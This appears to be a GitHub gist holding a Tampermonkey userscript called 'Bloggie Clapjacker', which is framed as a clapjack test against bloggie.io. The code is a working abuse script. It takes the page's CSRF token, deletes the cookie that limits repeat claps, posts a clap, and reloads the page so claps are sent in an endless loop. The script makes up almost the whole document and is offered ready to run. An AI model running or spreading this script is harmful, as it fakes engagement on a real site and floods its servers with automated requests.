Skip to content

Instantly share code, notes, and snippets.

@Rayraegah

Rayraegah/clapjacker.js

Last active Sep 26, 2019
Embed
What would you like to do?
Clapjack test on Bloggie.io
// ==UserScript==
// @name Bloggie Clapjacker
// @namespace http://tampermonkey.net/
// @version 0.3
// @description Find and hijack claps on bloggie.io posts
// @author You
// @match *://bloggie.io/@*/*
// @grant none
// ==/UserScript==
(function() {
// gets document location
const location_blocks = location.href.split("/");
// creates clap endpoint
const clap_ep = `https://bloggie.io/posts/${location_blocks[location_blocks.length - 1]}/claps`;
// grabs the csrf token that's injected into page header
const csrfToken = document
.querySelector("meta[name='csrf-token']")
.getAttribute("content");
// resets document cookie
document.cookie = `claps=; expires=${+new Date()}; domain=${document.domain}; path=/`;
// post a clap
fetch(clap_ep, {
headers: {
"x-csrf-token": csrfToken
},
method: "POST",
credentials: "include" /* includes cookies */
}).then(function() {
// reload page to trigger an infinite loop for this userscript
// contineously posts claps
location.reload(true);
});
})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment